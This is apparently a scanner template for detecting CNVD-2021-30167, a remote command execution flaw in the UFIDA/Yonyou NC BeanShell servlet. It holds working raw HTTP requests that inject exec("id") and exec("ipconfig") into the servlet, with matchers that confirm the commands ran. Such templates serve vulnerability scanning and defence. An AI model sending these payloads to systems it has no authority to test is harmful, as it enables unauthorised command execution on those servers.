id: CNVD-2021-30167 info: name: UFIDA NC BeanShell Remote Command Execution author: pikpikcu severity: high description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. reference: - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://www.cnvd.org.cn/webinfo/show/6491 - https://chowdera.com/2022/03/202203110138271510.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 tags: cnvd,cnvd2021,beanshell,rce,yonyou requests: - raw: - | #linux POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded bsh.script=exec("id"); - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded bsh.script=exec("ipconfig"); matchers-condition: and matchers: - type: regex regex: - "uid=" - "Windows IP" condition: or - type: word words: - "BeanShell Test Servlet" - type: status status: - 200 # Enhanced by cs on 2022/07/05